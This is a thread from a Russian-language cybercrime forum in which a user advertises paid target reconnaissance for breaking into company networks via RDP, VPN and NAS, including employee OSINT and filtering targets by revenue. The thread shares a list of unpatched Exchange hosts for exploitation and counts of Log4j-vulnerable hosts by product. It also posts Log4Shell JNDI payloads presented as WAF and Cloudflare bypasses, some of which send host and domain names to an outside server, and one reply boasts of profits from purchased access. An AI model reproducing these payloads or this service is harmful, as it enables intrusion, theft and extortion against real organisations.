• XSS.stack #1 – первый литературный журнал от юзеров форума

Свежий материал для Exploits. IP 2 CVE / 0.0.0.0 - 255.255.255.255

В этой теме можно использовать автоматический гарант!

marmalade

Gray Hat ♣ White Rabbit
Пользователь
Регистрация
29.07.2021
Сообщения
691
Реакции
723
Гарант сделки
10
Депозит
0.1 и др.
JitteryPlasticBactrian-size_restricted.gif


Нужно получить доступ в сеть компании?
Открыть чужой рабочий стол по RDP или ворваться в корпоративный VPN?
А может заглянуть в NAS хранилище компании за бекапами?

Найду IP:port / Doman / CMS / Emails / Админки во всем интернете, именно те, что вам нужно.

Цена: от 50$ за простую выгрузку. Обагощаю данные слоями!

Опционально:
  • Check и верификация уязвимостей (приват и паблик CVE)​
  • Отфильтрую денежные хосты IP/domain 2 Revenue по Zoominfo.com
  • Прочекаю хосты/домены на CMS и стек технологий​
  • OSINT целей - найду корпоративные и личные email сотрудников​
Также, в наличие API ключи Shodan/Zoomeye/Fofa и др.
Связь PM, отвечаю быстро.

Пример топ базы:

report-scrn1.png
report-scrn2.png
report-scrn3.png
 
Последнее редактирование:

База хостов Microsoft Exchange для экплуатации​

Более 18% Exchange серверов остаются не запатченными и уязвимыми к ProxyShell.
40% подвержены уязвимости CVE-2021-31206

Бесплатная база выложена здесь:
http://xssforum7mmh3n56inuf2h73hvhnzobi7h2ytb3gvklrfqm7ut3xdnyd.onion/threads/55232/

1628923335400.png


И это факт уже освещен и получил дополнительное внимание в медиа:

1629360301200.png
 
Последнее редактирование:
shodan не владеет полным списком, есть более изащерёный способ через nmap и добычей айпи через базу по странам и регионам.
Ну да, не все хосты есть в Шодане. А вот в nmap нет ничего изащренного, как по мне. Просьба не разводить флейм. Тема только для отзывов и весомых комментариев.

Помимо Shodan, есть Zoomeye, Fofa, Censys и другие, где разные технологии и база данных хостов. Некоторые, просто не могут быстро или много сканировать, поэтому между ними будут отличие в 10-20% и чтобы собрать полную базу, нужно иметь в каждом аккаунты, выгружать их базу и совмещать, удаляя дубликаты.
 

Вложения

  • shops-scan-magento.png
    shops-scan-magento.png
    40.5 КБ · Просмотры: 1 333
Последнее редактирование:
Давайте просто сравним FOFA и Shodan на одном ip range (shodan не поддерживает CIDR нотацию)
Shodan: 7,935 FOFA: 20,196
Более чем в 2 раза. И это без исторических данных FOFA
Там ещё когда шодан начинаешь скачивать выясняется на самом деле хостов меньше чем он пишет в веб-поисковике :D
Я думаю что админы научились блокировать шодан а вот про фофу никто не слышал ничего.
Кстати есть ещё binaryedge.io
 
photo1639487813.jpg


Log4Shell - RCE 0-day exploit in log4j 2, a popular Java logging package.

Обычно установлен на:

Apache Struts
Apache Solr
Apache Druid
Apache Flink

А так же:

Writeups:

PoC's:


Detection:



Здесь списки забаненых хостов которые эксплоатируют Log4Shell


CF bypass:
${jndi:dns://aeutbj.example.com/ext}
${jndi:${lower:l}${lower:d}a${lower:p}://example.com/

WAF bypass:
${jndi:ldap://127.0.0.1:1389/ badClassName}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${upper:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://${hostName}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.${env:COMPUTERNAME}.${env:USERDOMAIN}.${env}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
 
Последнее редактирование:
Замотался и все забывал выложить софт с log4j для эксплоатации log4shell. Сделал небольшую подборку 34 софта из 100 в которых стоит эта либа.
Поделюсь в ПМ небольшой пачкой хостов по каждому софту для тестов

Log4j Software list:

Hosts - Software

86908 - APACHE-ActiveMQ
895 - Apache_OFBiz
2006 - APACHE-Zeppelin
36585 - 泛微-协同办公OA
237 - 致远互联-FE
5444 - 泛微-E-Weaver
45404 - 致远互联-OA
8101 - 用友-UFIDA-NC
2 - jeewms
3861 - vmware-Workspace-ONE-Access
99 - vmware-vRealize-Automation-Appliance
7976 - JAMES-Mail-Server
17292 - APACHE-Shiro
14394 - APACHE-dubbo
1003878 - vmware-SpringBoot-Framework
1023 - JEECMS
672 - Zipkin
1 - FORESCOUT-Administration
7259 - APACHE-hadoop-YARN
665 - APACHE-Storm
3599 - 用友-NC-Cloud
143 - vmware-vRealize-Log-Insight
660 - APACHE-Druid
494 - Firehose_SERVICE_MONITORING
173 - APACHE-Unomi
54405 - RedHat-Jboss
55990 - Oracle-Weblogic_interface_7001
5 - druid-server
96129 - elastic-Elasticsearch
377 - elastic-Elasticsearch-Engineer
12 - Oracle-BI-Publisher-Enterprise
258 - vRealize-Operations-Tenant-App
78154 - RedHat-JBoss-AS
87791 - UNIFI-unifi-摄像头
 
Последнее редактирование:

Database of Microsoft Exchange hosts for exploitation​

More than 18% of Exchange servers remain unpatched and vulnerable to ProxyShell.
40% are affected by CVE-2021-31206

The free base is posted here:
http://xssforum7mmh3n56inuf2h73hvhnzobi7h2ytb3gvklrfqm7ut3xdnyd.onion/threads/55232/

Посмотреть вложение 25795

And this fact has already been covered and received additional attention in the media:

Посмотреть вложение 25995
bro please can you give the new link ? the old link is expired (((
 
wow thank you for this useful info. I very much appreciate it and i'm sure many others do as well!
photo1639487813.jpg


Log4Shell - RCE 0-day exploit in log4j 2, a popular Java logging package.

Обычно установлен на:

Apache Struts
Apache Solr
Apache Druid
Apache Flink

А так же:

Writeups:

PoC's:


Detection:



Здесь списки забаненых хостов которые эксплоатируют Log4Shell


CF bypass:
${jndi:dns://aeutbj.example.com/ext}
${jndi:${lower:l}${lower:d}a${lower:p}://example.com/

WAF bypass:
${jndi:ldap://127.0.0.1:1389/ badClassName}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${upper:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://${hostName}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.${env:COMPUTERNAME}.${env:USERDOMAIN}.${env}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
 
shodan не владеет полным списком, есть более изащерёный способ через nmap и добычей айпи через базу по странам и регионам.
Почему изощренный?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Закупился матом по форти и цискарям - лутнул ровно лям зелени. Материал божественный! Закупаю следующую партейку!
 
Последнее редактирование:
2 статейки рекомендуются к прочтению. По сути без разницы какую цифру шодан показывает, она не как к реальности не относится.

 


Напишите ответ...
Верх